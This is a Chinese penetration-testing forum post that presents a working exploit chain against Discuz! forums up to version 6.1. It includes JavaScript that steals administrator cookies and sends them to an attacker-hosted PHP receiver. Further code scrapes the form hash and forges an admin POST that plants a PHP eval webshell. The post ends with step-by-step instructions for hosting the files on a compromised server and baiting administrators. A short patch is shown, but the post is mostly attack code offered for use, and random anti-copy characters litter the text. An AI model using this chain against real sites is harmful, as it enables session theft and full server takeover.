中国网络渗透测试联盟

标题: Discuz XSS得webshell [打印本页]

作者: admin    时间: 2012-9-13 17:11
标题: Discuz XSS得webshell
Discuz XSS得webshell8 Q. U% q3 g) u* N! Z' \
By racle @tian6.com% k- L" _& u- K
欢迎转帖.但请保留版权信息.
; @) C! d( k2 W: [1 c' G受影响版本iscuz<=6.1.0,gbk+utf+big5# @  n$ B% N' z! L+ Z/ V2 _
8 t0 B4 L7 i% M2 `  K0 R- T  ^& a
新增加完全JS利用版本,只有一个文件.ajax-racle.js.有效版本提升至DZ6.1(理论上7.0版本都可以,但是6.1以上版本都已经默认打上补丁),新增浏览器版本判断,对方浏览器为IE或FIREFOX都有效.5 b) O# F: Y# @4 H* k- y

  g: r- ~' b1 x8 B
5 A# U! b' ]+ k  _( g3天前有朋友在论坛问过,说Discuz有个非论坛创始人获得WEBSHELL的漏洞,是superhei早前发出来的一大堆DISCUZ漏洞之一.见原帖:http://bbs.tian6.com/redirect.ph ... 54794&ptid=8706
% e1 E+ Q. E  ^7 ]0 `1 @当时我说一会就弄出来给大家,但是实际上一接触,发现这个漏洞本身需要管理员后台权限,要广泛普遍的利用还是很复杂的,主要是以下几个问题,所以拖到今天才基本完工.: ]: d8 o  v- I5 H- k
" Z. g$ g, i* f6 L# @" \
分析和写EXP的过程中,得到t0by57,Superhei的大力帮助.他们PHP和JS都不错的哦!希望大家看这篇文章时,更注意分析和明白的过程,毕竟XSS是目前WEB安全的最大头戏.各种形式:XSIO,Cross Iframe Trick,crsf等等..
& h& m: ~5 l$ E. m7 C本帖补充其中一个FLASH XSS应用方法:配合Discuz得shell-Flash XSS( R/ l( r* n6 V- i0 G$ |

% p" |7 t  _1 J. N8 e
$ {  v+ T, k* F& r  `! g+ G$ P----------------------------------------------------------前言分隔线-----------------------------------------------------------------------------
  n; M# F5 R8 E* V2 [9 R3 }* n, O# {; G2 Q8 V% u) w8 X

# r3 J. N" X! N9 _  n1 e8 [5 Nproblem1:漏洞页面runwizard.inc.php数据提交方式为post.需要模拟POST提交.
! Z+ O# k3 F9 ]$ C# A4 n4 h4 i
7 H9 k3 k% B8 p, ~0 B$ Y8 E1 {2 Eproblem2ISCUZ论坛在数据提交的时候还验证了referer,因此还要伪造一下.php socket和js都可以伪造referer.7 M! ?- C$ {" S  Q
' f  j' G4 i/ _# n% e4 w
problem3:formhash()函数采用了用户名+密码+XXX的算法得出,程序本身没办法模拟算出来,于是又耗费了我一段时间,最终想到个傻办法,从源代码里读出来.呵呵.这里是参考了superhei的一个旧EXP想出来的.
/ O: F; F+ _' D9 s0 X% m
9 ~7 y* ^. S% X( |) V" ]4 c- R
4 i0 N, D& ^; w- f. q下面,我为大家简单说说这个漏洞的成因和补的办法.这里是有漏洞的文件代码:bbs/admin/runwizard.inc.php,里面有个函数function saverunwizardhistory() {, R0 X! ?+ K/ n  g8 A# H
7 D- |2 d% o# k7 A
        global $runwizardfile, $runwizardhistory;
# ^$ S9 C8 S0 b9 y# q7 n
" ?$ X$ B2 f/ {' U        $fp = fopen($runwizardfile, 'w');( a) `, q, n( z( Y1 D! w  f
: X* f1 j  o; z/ ]
        fwrite($fp, serialize($runwizardhistory));: O7 {- n) q- ?! [! @8 o5 t! N
  H& @6 v. J5 Z, A0 ]) l
        fclose($fp);
; e1 x% h# [% {: u2 k7 I2 a- o. b# N9 Q/ G/ Q8 M4 f$ b( G5 B
}9 s1 U4 @* K8 k" J* d
复制代码serialize($runwizardhistory)直接就写进$fp里.runwizardhistory是什么呢?是论坛一些基本的配置信息,譬如论坛名.反应在论坛后台,位置是:discuz.com/bbs/admincp.php?action=runwizard&step=2.论坛名称,地址等三项信息都没任何过滤.该三项内容任何一项都可以直接写入一句话,提交,然后保存在缓存:bbs/forumdata/logs/runwizardlog.php里.7 t& h5 o% Z8 z, p0 ^
以下是修补的办法:function saverunwizardhistory() {( C8 F. a+ S0 V* `
% |* U5 |8 J9 T& _
        global $runwizardfile, $runwizardhistory;
, r9 k8 x( t+ e1 [- N; D2 T/ N. q: u4 k0 z' v0 G. R
        $fp = fopen($runwizardfile, 'w');5 }/ W" l5 D) q

! a$ p7 y$ h9 a' H/ Q        $s = '<?php exit;?>';0 g) H* F3 _# B' o- K

, i& p$ B& {- J4 V0 O        $s .= serialize($runwizardhistory);
2 e7 x: D; }/ i# q5 m3 F9 g  r- ?7 X9 y4 x" d. n" i
        fwrite($fp, $s);
" o2 `" |' U7 o+ o0 j) h3 I% H& f( M; V$ c  V7 H
        fclose($fp);
8 E* y4 O+ O4 D
  u  z$ p( L/ T- q, \: z1 Y}7 N6 a* d; N4 X7 J- l8 G; t
复制代码加写 '<?php exit;?>';到最前面,退出并且忽略该文件后面所有PHP代码.这么即使里面有一句话,也不能再被执行.
& U0 w$ F) K1 _& ^; W; j3 u3 D6 W2 R! R+ Z

& p. c7 ~) `5 ?( B( J4 _+ R8 ~% h! j  F. J3 L) w. n! q
----------------------------------------漏洞的成因和利用方法分隔线-----------------------------------------------------------------------------
" ~5 O% O/ M" |/ B, q* K+ N$ N# Q) p2 a- C: M' W1 Z
& b# G( h+ ?8 g  i
  以上是该漏洞的成因和利用方法.大家看到这里,估计也认为这是个鸡肋漏洞了吧,首先要有管理员权限,有后台权限,然后才能上WEBSHELL,实话说,有后台权限,拿SHELL的办法也并不止这一个.所以这个洞的价值,看起来就不大了.当然,这个已经被发布的nday不是我本帖要讲的重点.这里我主要是想告诉大家,将XSS,Crsf和本漏洞联合起来的办法.这样该洞价值就大很多了.
7 o! r, o7 L3 X8 a. i; ?+ o6 S4 H/ E2 O4 P( R; R- i
我们的思路是:论坛上有个xss点,Crsf flash(的确有,Discuz! member.php xss bug,Discuz! 数据库错误信息xss bug,Discuz! flash Crsf bug,Discuz! admincp.php xss bug,Discuz![flash] xss bug),管理员点击或浏览后,就执行了我们的JS,带他到外部一个JS中,通过JS获得他的COOKIES,获得他的HASH,然后经过外部一个PHP封装SOCKET以POST的形式提交前面说的动作,如果论坛没有补上该问题(目前没几个论坛补了.当然,天阳已经补了.^^),那么就会产生bbs/forumdata/logs/runwizardlog.php这个WEBSHELL.
$ o' A( G& \9 j! q/ k+ S% ~0 ]5 a& l: O1 d; M9 K  l4 @- g9 k
这篇文章主要不是给大家个EXP,然后让大家拿着到处乱黑的,主要是讲方法,讲思路.因为这里学问不少.! A  ~8 m) X! X8 E
8 A# l( {  H6 E) g  B
首先我们要看,怎么通过JS,获得管理员COOKIES,然后把COOKIES传递给最终提交的PHP.获得的办法相信大家都知道,但是传递的办法,譬如以图片形式传递,就非常稳定和实用.是实现AJAX本地语言到服务器语言PHP的好办法.JS部分代码:2 J4 S8 Y. |* u

  n% B9 \& F+ l  t1 evar url="http://目标网站/admincp.php";      * e7 g* k- I* @2 [! b

$ t# S2 s5 o8 b0 j+ C/*获得cookies*/6 @& i; G) p6 T5 a* H9 [" e& O
" N# B  q* L' N
function getURL(s) {* Q# p' b& n- T; R
) N0 I! ~9 {+ i1 [5 S5 e7 Z5 g# @3 J
var image = new Image();
9 v" @. |, g- o5 `! z7 |  _, U) H( v+ I* ?6 A2 D; W0 ^& e7 h* ?
image.style.width = 0;
6 O$ T( G/ F; F. e. n& A8 T. Y
: }0 r- h/ i) simage.style.height = 0;& p' Q% [2 G4 @- x  j& w1 ~

. h& \! Q* E! `5 i; rimage.src = s;+ D* q: d0 |# }  q0 w9 g  M
5 X" I; A3 W% x
}
* |- g* _( d% K1 {8 ]7 P8 U3 R: A9 y- G! A
getURL("我们做好的接收cookies的.php?x="+encodeURIComponent(document.cookie));  //这里就通过image变量传给了php
3 \8 p8 H0 y3 t3 h$ o1 q6 V复制代码php以get方式接收过来的变量.$cookies=$_GET['x'];) v' `5 |. p+ k
复制代码同理,hash我也是这么传到PHP里.不过HASH的获得方法也是很有意思的,众所周知,discuz有formhash来保护每个授权访问的唯一性.但是你也可以发现,在论坛页面用户退出的地方,引用了这个hash.我们要做的,就是从页面的源文件里搜索出hash,筛选出来,传递给PHP即可.筛选的办法很多,你有兴趣的话,可以看看我的筛选JS代码(而且这里discuz其实还留了一手,呵呵)
6 _, Q+ s- g4 V" G8 m
& n( [7 _) d4 z
' K, e  {; N' i3 e) g% b2 D8 a* y获得了cookies和hash以后,我们需要结合完整数据,做一次模拟提交,大家可以看看,这个是我之前写好的AJAX提交方式:var url="http://tian6.com/raclebbs/";
: E- O9 T; I4 j
+ l! z  X% n7 ^4 l* z# k; b' q4 O" Q
. l5 f0 H7 O* j+ f  A2 \% K4 k6 N4 P# r9 R
/*hash*/
' q. e: @' `/ Q8 z- T( ?
$ ^& |" X* z% p. _! ]. S" v. jvar xmlHttpReq = new ActiveXObject("MSXML2.XMLHTTP.3.0");  i. N( k+ |1 J
# K9 |5 L% `) ^
xmlHttpReq.open("GET", url+"admincp.php?action=home", false);
4 V, ]! g( B8 c  p, [+ @
2 K$ [; F7 |% T! X& SxmlHttpReq.send();3 l* J  O3 X0 r' Z' i
1 Y4 f5 }1 R: S5 k8 B5 h5 L
var resource = xmlHttpReq.responseText;  ~2 Q4 |' o) f) J9 T6 G

) b0 R& |3 l5 T4 |; zvar numero = resource.search(/formhash/);) e9 j) {9 y- O. }

' l, i/ E0 I9 ?" |1 p! Yvar formhash=encodeURIComponent(resource.substr(numero+17,8));
: ~9 E' P; B" F% ?; t$ i, z5 \/ k, o! M6 f9 F: Z/ x

+ c( O- r% H" ]( b
( ?$ X* Y. s7 J1 h7 T" Ovar post="formhash="+formhash+"&anchor=&settingsnew%5Bbbname%5D=1&settingsnew%5Bsitename%5D=<%3Fphp+eval(%24_POST[racle])%3F>racle%40tian6.com&settingsnew%5Bsiteurl%5D=http%3A%2F%2Fwww.comsenz.com%2F&step2submit=%E4%B8%8B%E4%B8%80%E6%AD%A5";//构造要携带的数据
# d& Y" I! X: a! G. I
( r1 ]( H! g- t, E! R. _! IxmlHttpReq.open("OST",url+"admincp.php?action=runwizard&step=3",false);//使用POST方法打开一个到服务器的连接,以异步方式通信
1 e# W/ K: x! n/ E
. z" a& Q. c, B2 @1 n  q2 j8 R1 ixmlHttpReq.setRequestHeader("Referer", url);5 I- U) q, K- q3 m

* E7 H. k. `* w; i' b! HxmlHttpReq.setrequestheader("Accept","image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, */*");: H. }3 l8 L# t- l
+ y) _8 `/ }+ [! g
xmlHttpReq.setrequestheader("content-length",post.length);
! R' }1 u0 N% P/ y+ {4 ^' }& e( h: b7 N: |
xmlHttpReq.setrequestheader("content-type","application/x-www-form-urlencoded");
: s: x) \3 T8 \9 B& T8 Q( e9 D0 `; _# r
xmlHttpReq.send(post);//发送数据
& B1 [3 u( ~# T# y" i; H复制代码这里HASH我假设正确,这样提交,也无须cookies6 m2 z  M/ ?& N2 F6 l: o
8 D! h# n, i3 t8 p- @
再看看以PHP SOCKET形式提交.$sock = fsockopen("$url", 80, $errno, $errstr, 30);: G, Q0 u( W5 Y- F0 m+ e9 m

/ j% Q( B& G$ s6 r' Zif (!$sock) die("$errstr ($errno)\n");9 q( D, X* T1 j7 C, x) j
; O% {4 {5 }+ x7 h8 H
$data = 'formhash='.$hash.'&anchor=&settingsnew%5Bbbname%5D=Discuz&settingsnew%5Bsitename%5D=<%3Fphp+eval(%24_POST[racle])%3F>racle%40tian6.com&settingsnew%5Bsiteurl%5D=http%3A%2F%2Fwww.comsenz.com%2F&step2submit=%E4%B8%8B%E4%B8%80%E6%AD%A5';2 {8 U& q' I3 @/ s8 O1 d! g9 o

6 g: M) d( r; A6 K8 Q0 A' r7 \/ ~$ B  p, z3 G. }4 R# |
- C0 q+ d" K2 L% I2 n
fwrite($sock, "OST http://$url/admincp.php?action=runwizard&step=3 HTTP/1.1\r\n");* @8 C) `, R8 |6 r1 m; V, L

8 U( A+ u- v7 U3 J! Ofwrite($sock, "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, */*\r\n");
4 f+ L. }, Y1 |% W- E6 m/ b0 E+ l/ o& `) p- p
fwrite($sock, "Referer: http://$url/admincp.php?action=runwizard&step=2\r\n");: i3 A7 P) z7 k2 Z
3 W2 f5 ]! _; t9 H2 ^! ~3 V. u
fwrite($sock, "Accept-Language: zh-cn\r\n");1 @2 I# _* z. C$ ~4 C
2 W- B* s: ?! G" |
fwrite($sock, "Content-Type: application/x-www-form-urlencoded\r\n");  t6 {, W2 u! `2 X7 T! R' |
3 m/ Q9 ~7 V, X" e0 E( m
fwrite($sock, "Accept-Encoding: gzip, deflate\r\n");
9 O1 F0 [# h# e( m" d# P# w
$ W& f/ y3 g, `9 f3 dfwrite($sock, "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; http://bsalsa.com) ; User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; http://bsalsa.com) (Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)); .NET CLR 1.1.4322; .NET CLR 2.0.50727)\r\n");- i4 J! q& e% z. @) v
6 E$ _- @/ S! \; J- W. \
fwrite($sock, "Host: $url\r\n");2 H( b5 k  T! P+ [3 h
) I8 T) c# {: q% J+ ]" f+ K- Q
fwrite($sock, "Content-Length: ".strlen($data)."\r\n");
9 b8 J% Q- N2 g* b1 L  M* g; O" s3 X
fwrite($sock, "Connection: Keep-Alive\r\n");9 @1 N& V% s+ Q0 r, ?( H! ]- H, \
  q4 \' S$ |; e! B
fwrite($sock, "Cache-Control: no-cache\r\n");
. Q6 m+ D! W7 ~/ A$ L/ F% L6 T3 c2 e3 f+ \" b7 |0 z
fwrite($sock, "Cookie:".$cookies."\r\n\r\n");
2 }; E" R- ^0 T6 R8 j, @+ Y4 p/ w. [( s6 c) X' ^6 p' T1 R
fwrite($sock, $data);# n3 A- k  ]4 p# B0 e! q
- b9 Q9 a, F# y- Y+ o' \3 F
7 j, q8 G# l. B2 \; y8 g6 n
1 G7 M% S2 ^5 H6 X
$headers = "";2 j' r2 C, L5 k) [3 K% }
  K( n, w# o2 M- P+ N3 V
while ($str = trim(fgets($sock, 4096)))2 Y9 H7 g/ }" J

7 a9 Q: U: x8 J( i* z. o' p* B$ F     $headers .= "$str\n";& u4 l3 t+ f! \. T* p% V2 {

5 @% D) |1 b9 ], y1 {6 Zecho "\n";5 x( }' S8 l2 i

0 f4 \6 i0 Z0 f! H! T. m$body = "";1 L0 n& I. I# V/ H' n- E2 a, }

2 y+ A0 y, x" A* _* K/ x* ?0 H( f9 jwhile (!feof($sock))5 L/ Y, I% o: ~- `. t1 L0 P

! T& d  Z1 I! d( Q9 |     $body .= fgets($sock, 4096);+ A- p: V4 Y+ |) i% u2 ]

" V: S+ g+ Y5 K% I/ Cfclose($sock);
6 S5 c6 S# D) d) U" X/ K  P* a  e
  [) t4 z" E* lecho $body;1 e: e& R9 q# l- F
复制代码整个漏洞XSS应用大致如此,下面附上JS文件,PHP封装好的提交文件.利用文件限制一下,已注册用户才可以下载,刚来也没关系,仔细看看前面的分析,你也差不多能写出来.^^2 N: b, G. k( C( j, q4 V, L! ]

* G+ L$ @8 P# ~/ k' g- c. A
) C) k: e* |0 e9 r; k6 N" u9 F8 Z-------------------------------------------XSS文件分析分隔线-----------------------------------------------------------------------------
5 A- Y2 @( @8 V" g3 r, b1 o# Z
6 u* N6 L' K5 B$ m5 E- r3 \
( K& r0 U" [2 y) p+ n) s9 p1HP SOCKET利用方法首先打开racle.js
) V+ z. g9 ?; G$ l  X* k; c) i9 w% ^8 V9 z9 o) e& ?2 R
var url="http://tian6.com/raclebbs/admincp.php?action=home"; //改成你要XSS攻击的目标,譬如http://www.discuz.com/admincp.php?action=home! D; c9 _  |% W9 G5 Q1 d2 ^5 P" l! J

0 C0 O+ ~" R1 S5 w5 U3 ]9 {4 S/ a1 O

  f$ Q) s2 f% W# I5 l/ x2 H( l7 q然后打开racle@tian6.php6 n/ R& o, g* O; K
: M6 l) B$ g  l9 _5 ?
$url="racle@tian6.com";   //改成你要XSS攻击的目标,譬如www.discuz.com6 _( e* B* O4 H. w, K9 J

. ^; D% K1 V4 {/ A6 ^2 n7 D+ K
; u) R& g! z1 a4 p8 A/ e; @
- k0 s0 p" q! k3 i7 [6 w如果目标论坛为6.1版本,无须再改动.如果目标为6.0或以下版本,请修改:
" Z( @7 V  K* {5 c# @
6 g2 _2 J" J' T0 |% T4 hgetURL("racle@tian6.php?resource_hash="+encodeURIComponent(resource.substr(numero+17,8))+"&x="+encodeURIComponent(document.cookie));0 @' Y: z; y2 y2 U6 w
- c, @' A9 A& U2 K- o( _
/ j& V+ o) u5 ?' ?8 o1 c

$ L4 ^& ~! q6 p$ P  ?+ ^2 KgetURL("racle@tian6.php?resource_hash="+encodeURIComponent(resource.substr(numero+9,8))+"&x="+encodeURIComponent(document.cookie));
3 O1 F% X' O/ J) u) _- O1 O; m复制代码2:JS利用方法打开ajax-racle.js,修改var url="http://tian6.com/raclebbs/";为你要攻击的论坛地址.: ^8 ~6 W8 B$ {6 f2 A+ D1 j

' c3 A  @4 T( d, T" M6 R' W5 ]6 O# }! K+ H+ D

. ?4 g! s. U; }* ?如果目标论坛为6.1版本,无须再改动.如果目标为6.0或以下版本,请修改:6 n7 ^; I) X3 n( k; }# D
- B* x* f) y/ S; r5 _3 K5 U
var formhash=encodeURIComponent(resource.substr(numero+17,8));$ I& p1 R; m( M, E+ ?* J' x* N, W- P+ W0 t
" j) Y% M3 |+ n
7 t3 @8 m4 D5 [9 @- q
: I" I4 g: U( |7 b0 A0 {
var formhash=encodeURIComponent(resource.substr(numero+9,8));) _; e, c& F( Y6 ~& P
复制代码ok.以上两种方法则其一.在攻击前,我们应该先看看论坛打上补丁没有,你可以尝试访问:http://target.com/bbs/forumdata/logs/runwizardlog.php,如果一片空白,那就没戏咯.不是空白就会有些论坛信息出现,但也不代表就肯定存在漏洞,因为可能人家补过之后没有更新过论坛信息而已.目前来说,有8成把握吧.
+ u$ m( m$ D6 h
9 U" d' W7 W) y( k- Z如果是第一种方法,就把racle.js,还有racle@tian6.php文件上传到一个可以执行PHP的地方,譬如你以前拿下的WEBSHELL里.两个文件需在同一目录下.记得该空间要支持PHP.然后在论坛以<script src=http://你放好的地方/racle.js></script>构造好XSS点.5 x& m8 _" N$ B4 z2 Q

4 S8 b9 v6 q+ C, e! d如果是第二种方法,就把ajax-racle.js,上传到一个你以前拿下的WEBSHELL里,然后在论坛以<script src=http://你放好的地方/ajax-racle.js></script>构造好XSS点.
' j; I; m* ~) \* }1 H3 V8 l$ N0 X' n) Q1 i4 C" b
不管你用什么方法,等到管理员一点该连接或者浏览一下论坛,他论坛bbs/forumdata/logs/runwizardlog.php里就多了个<?php eval($_POST[racle])?> ^^.赶紧拿控制端连上去吧.3 Q0 o. i# i) d9 {- H2 g; q

" g: \. h) f* x# n! b# Q$ O( ]




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2